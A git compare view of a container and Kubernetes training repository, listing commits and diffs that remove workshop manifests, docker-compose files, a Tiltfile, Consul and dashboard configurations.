Compare commits

..

15 Commits

Author SHA1 Message Date
Jerome Petazzoni
a4e21ffe4d fix-redirects.sh: adding forced redirect 2020-04-07 16:48:33 -05:00
Jérôme Petazzoni
ae140b24cb Merge pull request #435 from joepvd/patch-1
typo correction
2019-02-27 21:10:21 +01:00
Joep van Delft
ab87de9813 typo correction 2019-02-27 20:41:10 +01:00
Jerome Petazzoni
53a416626e Update WiFi + logistics 2018-12-17 01:43:45 -06:00
Jerome Petazzoni
8bf71b956f Customize all the things 2018-12-16 05:46:32 -06:00
Jerome Petazzoni
2c445ca99b Merge branch 'enixlogo' into decembre2018 2018-12-16 05:26:07 -06:00
Jerome Petazzoni
2ba244839a Merge branch 'consul-auto-join' into decembre2018 2018-12-16 05:25:31 -06:00
Jerome Petazzoni
0b71bc8655 Merge branch 'improve-kubectl-config-context' into decembre2018 2018-12-16 05:25:12 -06:00
Jerome Petazzoni
949fdd7791 Merge branch 'explain-system-masters' into decembre2018 2018-12-16 05:24:59 -06:00
Jerome Petazzoni
5cf8b42fe9 Merge branch 'mention-kubectl-logs-bug' into decembre2018 2018-12-16 05:24:45 -06:00
Jerome Petazzoni
781ac48c5c Merge branch 'bump-versions-to-1.13' into decembre2018 2018-12-16 05:23:57 -06:00
Jerome Petazzoni
1cf3849bbd Merge branch 'static-pods' into decembre2018 2018-12-16 05:23:47 -06:00
Jerome Petazzoni
c77960d77b Merge branch 'rewrite-labels-and-selectors' into decembre2018 2018-12-16 05:23:35 -06:00
Jerome Petazzoni
f01bc2a7a9 Fix overlapsing slide number and pics 2018-09-29 18:54:00 -05:00
Jerome Petazzoni
3eaa844c55 Add ENIX logo
Warning: do not merge this branch to your content, otherwise you
will get the ENIX logo in the top right of all your decks
2018-09-08 07:49:38 -05:00
541 changed files with 6188 additions and 94798 deletions

12
.gitignore vendored
View File

@@ -1,24 +1,12 @@
*.pyc
*.swp
*~
prepare-vms/tags
prepare-vms/infra
prepare-vms/www
prepare-tf/.terraform*
prepare-tf/terraform.*
prepare-tf/stage2/*.tf
prepare-tf/stage2/kubeconfig.*
prepare-tf/stage2/.terraform*
prepare-tf/stage2/terraform.*
prepare-tf/stage2/externalips.*
slides/*.yml.html
slides/autopilot/state.yaml
slides/index.html
slides/past.html
slides/slides.zip
node_modules
### macOS ###

View File

@@ -1,7 +1,5 @@
# Container Training
(Test for livecycle)
This repository (formerly known as `orchestration-workshop`)
contains materials (slides, scripts, demo app, and other
code samples) used for various workshops, tutorials, and
@@ -41,7 +39,7 @@ your own tutorials.
All these materials have been gathered in a single repository
because they have a few things in common:
- some [shared slides](slides/shared/) that are re-used
- some [common slides](slides/common/) that are re-used
(and updated) identically between different decks;
- a [build system](slides/) generating HTML slides from
Markdown source files;
@@ -201,7 +199,7 @@ this section is for you!
locked-down computer, host firewall, etc.
- Horrible wifi, or ssh port TCP/22 not open on network! If wifi sucks you
can try using MOSH https://mosh.org which handles SSH over UDP. TMUX can also
prevent you from losing your place if you get disconnected from servers.
prevent you from loosing your place if you get disconnected from servers.
https://tmux.github.io
- Forget to print "cards" and cut them up for handing out IP's.
- Forget to have fun and focus on your students!

View File

@@ -1,9 +0,0 @@
hostname frr
router bgp 64512
network 1.0.0.2/32
bgp log-neighbor-changes
neighbor kube peer-group
neighbor kube remote-as 64512
neighbor kube route-reflector-client
bgp listen range 0.0.0.0/0 peer-group kube
log stdout

View File

@@ -1,2 +0,0 @@
hostname frr
log stdout

View File

@@ -1,34 +0,0 @@
version: "3"
services:
bgpd:
image: ajones17/frr:662
volumes:
- ./conf:/etc/frr
- ./run:/var/run/frr
network_mode: host
entrypoint: /usr/lib/frr/bgpd -f /etc/frr/bgpd.conf --log=stdout --log-level=debug --no_kernel
restart: always
zebra:
image: ajones17/frr:662
volumes:
- ./conf:/etc/frr
- ./run:/var/run/frr
network_mode: host
entrypoint: /usr/lib/frr/zebra -f /etc/frr/zebra.conf --log=stdout --log-level=debug
restart: always
vtysh:
image: ajones17/frr:662
volumes:
- ./conf:/etc/frr
- ./run:/var/run/frr
network_mode: host
entrypoint: vtysh -c "show ip bgp"
chmod:
image: alpine
volumes:
- ./run:/var/run/frr
command: chmod 777 /var/run/frr

View File

@@ -1,29 +0,0 @@
version: "3"
services:
pause:
ports:
- 8080:8080
image: k8s.gcr.io/pause
etcd:
network_mode: "service:pause"
image: k8s.gcr.io/etcd:3.4.9
command: etcd
kube-apiserver:
network_mode: "service:pause"
image: k8s.gcr.io/hyperkube:v1.18.8
command: kube-apiserver --etcd-servers http://127.0.0.1:2379 --address 0.0.0.0 --disable-admission-plugins=ServiceAccount --allow-privileged
kube-controller-manager:
network_mode: "service:pause"
image: k8s.gcr.io/hyperkube:v1.18.8
command: kube-controller-manager --master http://localhost:8080 --allocate-node-cidrs --cluster-cidr=10.CLUSTER.0.0/16
"Edit the CLUSTER placeholder first. Then, remove this line.":
kube-scheduler:
network_mode: "service:pause"
image: k8s.gcr.io/hyperkube:v1.18.8
command: kube-scheduler --master http://localhost:8080

View File

@@ -1,128 +0,0 @@
---
apiVersion: |+
Make sure you update the line with --master=http://X.X.X.X:8080 below.
Then remove this section from this YAML file and try again.
---
apiVersion: v1
kind: ConfigMap
metadata:
name: kube-router-cfg
namespace: kube-system
labels:
k8s-app: kube-router
data:
cni-conf.json: |
{
"cniVersion":"0.3.0",
"name":"mynet",
"plugins":[
{
"name":"kubernetes",
"type":"bridge",
"bridge":"kube-bridge",
"isDefaultGateway":true,
"ipam":{
"type":"host-local"
}
}
]
}
---
apiVersion: apps/v1
kind: DaemonSet
metadata:
labels:
k8s-app: kube-router
name: kube-router
namespace: kube-system
spec:
selector:
matchLabels:
k8s-app: kube-router
template:
metadata:
labels:
k8s-app: kube-router
annotations:
scheduler.alpha.kubernetes.io/critical-pod: ''
spec:
serviceAccountName: kube-router
containers:
- name: kube-router
image: docker.io/cloudnativelabs/kube-router
imagePullPolicy: Always
args:
- "--run-router=true"
- "--run-firewall=true"
- "--run-service-proxy=true"
- "--master=http://X.X.X.X:8080"
env:
- name: NODE_NAME
valueFrom:
fieldRef:
fieldPath: spec.nodeName
- name: KUBE_ROUTER_CNI_CONF_FILE
value: /etc/cni/net.d/10-kuberouter.conflist
livenessProbe:
httpGet:
path: /healthz
port: 20244
initialDelaySeconds: 10
periodSeconds: 3
resources:
requests:
cpu: 250m
memory: 250Mi
securityContext:
privileged: true
volumeMounts:
- name: lib-modules
mountPath: /lib/modules
readOnly: true
- name: cni-conf-dir
mountPath: /etc/cni/net.d
initContainers:
- name: install-cni
image: busybox
imagePullPolicy: Always
command:
- /bin/sh
- -c
- set -e -x;
if [ ! -f /etc/cni/net.d/10-kuberouter.conflist ]; then
if [ -f /etc/cni/net.d/*.conf ]; then
rm -f /etc/cni/net.d/*.conf;
fi;
TMP=/etc/cni/net.d/.tmp-kuberouter-cfg;
cp /etc/kube-router/cni-conf.json ${TMP};
mv ${TMP} /etc/cni/net.d/10-kuberouter.conflist;
fi
volumeMounts:
- mountPath: /etc/cni/net.d
name: cni-conf-dir
- mountPath: /etc/kube-router
name: kube-router-cfg
hostNetwork: true
tolerations:
- key: CriticalAddonsOnly
operator: Exists
- effect: NoSchedule
key: node-role.kubernetes.io/master
operator: Exists
- effect: NoSchedule
key: node.kubernetes.io/not-ready
operator: Exists
volumes:
- name: lib-modules
hostPath:
path: /lib/modules
- name: cni-conf-dir
hostPath:
path: /etc/cni/net.d
- name: kube-router-cfg
configMap:
name: kube-router-cfg

View File

@@ -1,31 +0,0 @@
# Note: hyperkube isn't available after Kubernetes 1.18.
# So we'll have to update this for Kubernetes 1.19!
version: "3"
services:
pause:
ports:
- 8080:8080
image: k8s.gcr.io/pause
etcd:
network_mode: "service:pause"
image: k8s.gcr.io/etcd:3.4.9
command: etcd
kube-apiserver:
network_mode: "service:pause"
image: k8s.gcr.io/hyperkube:v1.18.8
command: kube-apiserver --etcd-servers http://127.0.0.1:2379 --address 0.0.0.0 --disable-admission-plugins=ServiceAccount
kube-controller-manager:
network_mode: "service:pause"
image: k8s.gcr.io/hyperkube:v1.18.8
command: kube-controller-manager --master http://localhost:8080
kube-scheduler:
network_mode: "service:pause"
image: k8s.gcr.io/hyperkube:v1.18.8
command: kube-scheduler --master http://localhost:8080

View File

@@ -1,67 +0,0 @@
# (1) Setting up a registry, and telling Tilt to use it.
# Tilt needs a registry to store images.
# The following manifest defines a Deployment to run a basic Docker registry,
# and a NodePort Service to access it. Using a NodePort means that we don't
# need to obtain a TLS certificate, because we will be accessing the registry
# through localhost.
k8s_yaml('../k8s/tilt-registry.yaml')
# Tell Tilt to use the registry that we just deployed instead of whatever
# is defined in our Kubernetes resources. Tilt will patch image names to
# use our registry.
default_registry('localhost:30555')
# Create a port forward so that we can access the registry from our local
# environment, too. Note that if you run Tilt directly from a Kubernetes node
# (which is not typical, but might happen in some lab/training environments)
# the following might cause an error because port 30555 is already taken.
k8s_resource(workload='tilt-registry', port_forwards='30555:5000')
# (2) Telling Tilt how to build and run our app.
# The following two lines will use the kubectl-build plugin
# to leverage buildkit and build the images in our Kubernetes
# cluster. This is not enabled by default, because it requires
# the plugin to be installed.
# See https://github.com/vmware-tanzu/buildkit-cli-for-kubectl
# for more information about this plugin.
#load('ext://kubectl_build', 'kubectl_build')
#docker_build = kubectl_build
# Our Kubernetes manifests use images 'dockercoins/...' so we tell Tilt
# how each of these images should be built. The first argument is the name
# of the image, the second argument is the directory containing the build
# context (i.e. the Dockerfile to build the image).
docker_build('dockercoins/hasher', 'hasher')
docker_build('dockercoins/rng', 'rng')
docker_build('dockercoins/webui', 'webui')
docker_build('dockercoins/worker', 'worker')
# The following manifests defines five Deployments and four Services for
# our application.
k8s_yaml('../k8s/dockercoins.yaml')
# (3) Finishing touches.
# The following line lets Tilt run with the default kubeadm cluster-admin context.
allow_k8s_contexts('kubernetes-admin@kubernetes')
# This will run an ngrok tunnel to expose Tilt to the outside world.
# This is intended to be used when Tilt runs on a remote machine.
local_resource(name='ngrok:tunnel', serve_cmd='ngrok http 10350')
# This will wait until the ngrok tunnel is up, and show its URL to the user.
# We send the output to /dev/tty so that it doesn't get intercepted by
# Tilt, and gets displayed to the user's terminal instead.
# Note: this assumes that the ngrok instance will be running on port 4040.
# If you have other ngrok instances running on the machine, this might not work.
local_resource(name='ngrok:showurl', cmd='''
while sleep 1; do
TUNNELS=$(curl -fsSL http://localhost:4040/api/tunnels | jq -r .tunnels[].public_url)
[ "$TUNNELS" ] && break
done
printf "\nYou should be able to connect to the Tilt UI with the following URL(s): %s\n" "$TUNNELS" >/dev/tty
'''
)

View File

@@ -1,6 +1,6 @@
FROM node:4-slim
RUN npm install express
RUN npm install redis@3
RUN npm install redis
COPY files/ /files/
COPY webui.js /
CMD ["node", "webui.js"]

View File

@@ -13,7 +13,7 @@
color: royalblue;
}
</style>
<script src="jquery-1.11.3.min.js"></script>
<script src="jquery.js"></script>
<script src="d3.min.js"></script>
<script src="rickshaw.min.js"></script>
<script>

1
dockercoins/webui/files/jquery.js vendored Symbolic link
View File

@@ -0,0 +1 @@
jquery-1.11.3.min.js

View File

@@ -2,14 +2,14 @@ version: "2"
services:
elasticsearch:
image: elasticsearch:2
image: elasticsearch
# If you need to access ES directly, just uncomment those lines.
#ports:
# - "9200:9200"
# - "9300:9300"
logstash:
image: logstash:2
image: logstash
command: |
-e '
input {
@@ -47,7 +47,7 @@ services:
- "12201:12201/udp"
kibana:
image: kibana:4
image: kibana
ports:
- "5601:5601"
environment:

View File

@@ -1,8 +0,0 @@
k8s_yaml(helm(
"./path-to-chart", name="blue",
values=[], # Example: ["./path/to/values.yaml"]
set=[
"image.repository=jpetazzo/color",
"image.tag=latest",
]
))

View File

@@ -1,16 +0,0 @@
apiVersion: apiserver.config.k8s.io/v1
kind: AdmissionConfiguration
plugins:
- name: PodSecurity
configuration:
apiVersion: pod-security.admission.config.k8s.io/v1alpha1
kind: PodSecurityConfiguration
defaults:
enforce: baseline
audit: baseline
warn: baseline
exemptions:
usernames:
- cluster-admin
namespaces:
- kube-system

View File

@@ -1,21 +0,0 @@
apiVersion: networking.k8s.io/v1beta1
kind: Ingress
metadata:
name: whatever
annotations:
traefik.ingress.kubernetes.io/service-weights: |
whatever: 90%
whatever-new: 10%
spec:
rules:
- host: whatever.A.B.C.D.nip.io
http:
paths:
- path: /
backend:
serviceName: whatever
servicePort: 80
- path: /
backend:
serviceName: whatever-new
servicePort: 80

View File

@@ -1,36 +0,0 @@
kind: Service
apiVersion: v1
metadata:
name: certbot
spec:
ports:
- port: 80
protocol: TCP
---
apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
name: certbot
spec:
rules:
- http:
paths:
- path: /.well-known/acme-challenge/
pathType: Prefix
backend:
service:
name: certbot
port:
number: 80
---
apiVersion: v1
kind: Endpoints
metadata:
name: certbot
subsets:
- addresses:
- ip: A.B.C.D
ports:
- port: 8000
protocol: TCP

View File

@@ -1,11 +0,0 @@
apiVersion: cert-manager.io/v1
kind: Certificate
metadata:
name: xyz.A.B.C.D.nip.io
spec:
secretName: xyz.A.B.C.D.nip.io
dnsNames:
- xyz.A.B.C.D.nip.io
issuerRef:
name: letsencrypt-staging
kind: ClusterIssuer

View File

@@ -1,18 +0,0 @@
apiVersion: cert-manager.io/v1
kind: ClusterIssuer
metadata:
name: letsencrypt-staging
spec:
acme:
# Remember to update this if you use this manifest to obtain real certificates :)
email: hello@example.com
server: https://acme-staging-v02.api.letsencrypt.org/directory
# To use the production environment, use the following line instead:
#server: https://acme-v02.api.letsencrypt.org/directory
privateKeySecretRef:
name: issuer-letsencrypt-staging
solvers:
- http01:
ingress:
class: traefik

View File

@@ -1,18 +0,0 @@
# Note: apiextensions.k8s.io/v1beta1 is deprecated, and won't be served
# in Kubernetes 1.22 and later versions. This YAML manifest is here just
# for reference, but it's not intended to be used in modern trainings.
apiVersion: apiextensions.k8s.io/v1beta1
kind: CustomResourceDefinition
metadata:
name: coffees.container.training
spec:
group: container.training
version: v1alpha1
scope: Namespaced
names:
plural: coffees
singular: coffee
kind: Coffee
shortNames:
- cof

View File

@@ -1,21 +0,0 @@
apiVersion: apiextensions.k8s.io/v1
kind: CustomResourceDefinition
metadata:
name: coffees.container.training
spec:
group: container.training
versions:
- name: v1alpha1
served: true
storage: true
schema:
openAPIV3Schema:
type: object
scope: Namespaced
names:
plural: coffees
singular: coffee
kind: Coffee
shortNames:
- cof

View File

@@ -1,37 +0,0 @@
apiVersion: apiextensions.k8s.io/v1
kind: CustomResourceDefinition
metadata:
name: coffees.container.training
spec:
group: container.training
scope: Namespaced
names:
plural: coffees
singular: coffee
kind: Coffee
shortNames:
- cof
versions:
- name: v1alpha1
served: true
storage: true
schema:
openAPIV3Schema:
type: object
required: [ spec ]
properties:
spec:
type: object
properties:
taste:
description: Subjective taste of that kind of coffee bean
type: string
required: [ taste ]
additionalPrinterColumns:
- jsonPath: .spec.taste
description: Subjective taste of that kind of coffee bean
name: Taste
type: string
- jsonPath: .metadata.creationTimestamp
name: Age
type: date

View File

@@ -1,34 +0,0 @@
---
kind: Coffee
apiVersion: container.training/v1alpha1
metadata:
name: arabica
spec:
taste: strong
---
kind: Coffee
apiVersion: container.training/v1alpha1
metadata:
name: excelsa
spec:
taste: fruity
---
kind: Coffee
apiVersion: container.training/v1alpha1
metadata:
name: liberica
spec:
taste: smoky
---
kind: Coffee
apiVersion: container.training/v1alpha1
metadata:
name: robusta
spec:
taste: stronger
bitterness: high
---
kind: Coffee
apiVersion: container.training/v1alpha1
metadata:
name: java

View File

@@ -1,78 +0,0 @@
# Basic Consul cluster using Cloud Auto-Join.
# Caveats:
# - no actual persistence
# - scaling down to 1 will break the cluster
# - pods may be colocated
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: consul
---
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
name: consul
rules:
- apiGroups: [""]
resources:
- pods
verbs:
- get
- list
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
name: consul
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: Role
name: consul
subjects:
- kind: ServiceAccount
name: consul
---
apiVersion: v1
kind: Service
metadata:
name: consul
spec:
ports:
- port: 8500
name: http
selector:
app: consul
---
apiVersion: apps/v1
kind: StatefulSet
metadata:
name: consul
spec:
serviceName: consul
replicas: 3
selector:
matchLabels:
app: consul
template:
metadata:
labels:
app: consul
spec:
serviceAccountName: consul
containers:
- name: consul
image: "consul:1.11"
env:
- name: NAMESPACE
valueFrom:
fieldRef:
fieldPath: metadata.namespace
args:
- "agent"
- "-bootstrap-expect=3"
- "-retry-join=provider=k8s label_selector=\"app=consul\" namespace=\"$(NAMESPACE)\""
- "-client=0.0.0.0"
- "-data-dir=/consul/data"
- "-server"
- "-ui"

View File

@@ -1,99 +0,0 @@
# Even better Consul cluster.
# That one uses a volumeClaimTemplate to achieve true persistence.
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: consul
---
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
name: consul
rules:
- apiGroups: [""]
resources:
- pods
verbs:
- get
- list
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
name: consul
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: Role
name: consul
subjects:
- kind: ServiceAccount
name: consul
---
apiVersion: v1
kind: Service
metadata:
name: consul
spec:
ports:
- port: 8500
name: http
selector:
app: consul
---
apiVersion: apps/v1
kind: StatefulSet
metadata:
name: consul
spec:
serviceName: consul
replicas: 3
selector:
matchLabels:
app: consul
volumeClaimTemplates:
- metadata:
name: data
spec:
accessModes:
- ReadWriteOnce
resources:
requests:
storage: 1Gi
template:
metadata:
labels:
app: consul
spec:
serviceAccountName: consul
affinity:
podAntiAffinity:
requiredDuringSchedulingIgnoredDuringExecution:
- labelSelector:
matchLabels:
app: consul
topologyKey: kubernetes.io/hostname
terminationGracePeriodSeconds: 10
containers:
- name: consul
image: "consul:1.11"
volumeMounts:
- name: data
mountPath: /consul/data
env:
- name: NAMESPACE
valueFrom:
fieldRef:
fieldPath: metadata.namespace
args:
- "agent"
- "-bootstrap-expect=3"
- "-retry-join=provider=k8s label_selector=\"app=consul\" namespace=\"$(NAMESPACE)\""
- "-client=0.0.0.0"
- "-data-dir=/consul/data"
- "-server"
- "-ui"
lifecycle:
preStop:
exec:
command: [ "sh", "-c", "consul leave" ]

View File

@@ -1,17 +1,9 @@
# Better Consul cluster.
# There is still no actual persistence, but:
# - podAntiaffinity prevents pod colocation
# - clusters works when scaling down to 1 (thanks to lifecycle hook)
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: consul
---
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
kind: ClusterRole
metadata:
name: consul
labels:
app: consul
rules:
- apiGroups: [""]
resources:
@@ -21,16 +13,24 @@ rules:
- list
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
kind: ClusterRoleBinding
metadata:
name: consul
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: Role
kind: ClusterRole
name: consul
subjects:
- kind: ServiceAccount
name: consul
namespace: default
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: consul
labels:
app: consul
---
apiVersion: v1
kind: Service
@@ -63,22 +63,20 @@ spec:
podAntiAffinity:
requiredDuringSchedulingIgnoredDuringExecution:
- labelSelector:
matchLabels:
app: consul
matchExpressions:
- key: app
operator: In
values:
- consul
topologyKey: kubernetes.io/hostname
terminationGracePeriodSeconds: 10
containers:
- name: consul
image: "consul:1.11"
env:
- name: NAMESPACE
valueFrom:
fieldRef:
fieldPath: metadata.namespace
image: "consul:1.4.0"
args:
- "agent"
- "-bootstrap-expect=3"
- "-retry-join=provider=k8s label_selector=\"app=consul\" namespace=\"$(NAMESPACE)\""
- "-retry-join=provider=k8s label_selector=\"app=consul\""
- "-client=0.0.0.0"
- "-data-dir=/consul/data"
- "-server"
@@ -86,4 +84,7 @@ spec:
lifecycle:
preStop:
exec:
command: [ "sh", "-c", "consul leave" ]
command:
- /bin/sh
- -c
- consul leave

View File

@@ -1,504 +0,0 @@
# This file was generated with the script ./update-dashboard-yaml.sh.
#
---
apiVersion: v1
kind: Namespace
metadata:
creationTimestamp: null
name: kubernetes-dashboard
spec: {}
status: {}
---
---
# Source: kubernetes-dashboard/templates/serviceaccount.yaml
# Copyright 2017 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
apiVersion: v1
kind: ServiceAccount
metadata:
labels:
app.kubernetes.io/name: kubernetes-dashboard
helm.sh/chart: kubernetes-dashboard-5.0.2
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/version: "2.3.1"
app.kubernetes.io/managed-by: Helm
name: kubernetes-dashboard
---
# Source: kubernetes-dashboard/templates/secret.yaml
# Copyright 2017 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# kubernetes-dashboard-certs
apiVersion: v1
kind: Secret
metadata:
labels:
app.kubernetes.io/name: kubernetes-dashboard
helm.sh/chart: kubernetes-dashboard-5.0.2
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/version: "2.3.1"
app.kubernetes.io/managed-by: Helm
name: kubernetes-dashboard-certs
type: Opaque
---
# Source: kubernetes-dashboard/templates/secret.yaml
# kubernetes-dashboard-csrf
apiVersion: v1
kind: Secret
metadata:
labels:
app.kubernetes.io/name: kubernetes-dashboard
helm.sh/chart: kubernetes-dashboard-5.0.2
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/version: "2.3.1"
app.kubernetes.io/managed-by: Helm
name: kubernetes-dashboard-csrf
type: Opaque
---
# Source: kubernetes-dashboard/templates/secret.yaml
# kubernetes-dashboard-key-holder
apiVersion: v1
kind: Secret
metadata:
labels:
app.kubernetes.io/name: kubernetes-dashboard
helm.sh/chart: kubernetes-dashboard-5.0.2
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/version: "2.3.1"
app.kubernetes.io/managed-by: Helm
name: kubernetes-dashboard-key-holder
type: Opaque
---
# Source: kubernetes-dashboard/templates/configmap.yaml
# Copyright 2017 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
apiVersion: v1
kind: ConfigMap
metadata:
labels:
app.kubernetes.io/name: kubernetes-dashboard
helm.sh/chart: kubernetes-dashboard-5.0.2
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/version: "2.3.1"
app.kubernetes.io/managed-by: Helm
name: kubernetes-dashboard-settings
data:
---
# Source: kubernetes-dashboard/templates/clusterrole-metrics.yaml
# Copyright 2017 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
kind: ClusterRole
apiVersion: rbac.authorization.k8s.io/v1
metadata:
name: "kubernetes-dashboard-metrics"
labels:
app.kubernetes.io/name: kubernetes-dashboard
helm.sh/chart: kubernetes-dashboard-5.0.2
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/version: "2.3.1"
app.kubernetes.io/managed-by: Helm
rules:
# Allow Metrics Scraper to get metrics from the Metrics server
- apiGroups: ["metrics.k8s.io"]
resources: ["pods", "nodes"]
verbs: ["get", "list", "watch"]
---
# Source: kubernetes-dashboard/templates/clusterrolebinding-metrics.yaml
# Copyright 2017 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
name: "kubernetes-dashboard-metrics"
labels:
app.kubernetes.io/name: kubernetes-dashboard
helm.sh/chart: kubernetes-dashboard-5.0.2
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/version: "2.3.1"
app.kubernetes.io/managed-by: Helm
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: kubernetes-dashboard-metrics
subjects:
- kind: ServiceAccount
name: kubernetes-dashboard
namespace: kubernetes-dashboard
---
# Source: kubernetes-dashboard/templates/role.yaml
# Copyright 2017 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
name: kubernetes-dashboard
labels:
app.kubernetes.io/name: kubernetes-dashboard
helm.sh/chart: kubernetes-dashboard-5.0.2
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/version: "2.3.1"
app.kubernetes.io/managed-by: Helm
rules:
# Allow Dashboard to get, update and delete Dashboard exclusive secrets.
- apiGroups: [""]
resources: ["secrets"]
resourceNames: ["kubernetes-dashboard-key-holder", "kubernetes-dashboard-certs", "kubernetes-dashboard-csrf"]
verbs: ["get", "update", "delete"]
# Allow Dashboard to get and update 'kubernetes-dashboard-settings' config map.
- apiGroups: [""]
resources: ["configmaps"]
resourceNames: ["kubernetes-dashboard-settings"]
verbs: ["get", "update"]
# Allow Dashboard to get metrics.
- apiGroups: [""]
resources: ["services"]
resourceNames: ["heapster", "dashboard-metrics-scraper"]
verbs: ["proxy"]
- apiGroups: [""]
resources: ["services/proxy"]
resourceNames: ["heapster", "http:heapster:", "https:heapster:", "dashboard-metrics-scraper", "http:dashboard-metrics-scraper"]
verbs: ["get"]
---
# Source: kubernetes-dashboard/templates/rolebinding.yaml
# Copyright 2017 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
name: kubernetes-dashboard
labels:
app.kubernetes.io/name: kubernetes-dashboard
helm.sh/chart: kubernetes-dashboard-5.0.2
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/version: "2.3.1"
app.kubernetes.io/managed-by: Helm
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: Role
name: kubernetes-dashboard
subjects:
- kind: ServiceAccount
name: kubernetes-dashboard
namespace: kubernetes-dashboard
---
# Source: kubernetes-dashboard/templates/service.yaml
# Copyright 2017 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
apiVersion: v1
kind: Service
metadata:
name: kubernetes-dashboard
labels:
app.kubernetes.io/name: kubernetes-dashboard
helm.sh/chart: kubernetes-dashboard-5.0.2
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/version: "2.3.1"
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/component: kubernetes-dashboard
kubernetes.io/cluster-service: "true"
spec:
type: NodePort
ports:
- port: 443
targetPort: http
name: http
selector:
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/component: kubernetes-dashboard
---
# Source: kubernetes-dashboard/templates/deployment.yaml
# Copyright 2017 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
apiVersion: apps/v1
kind: Deployment
metadata:
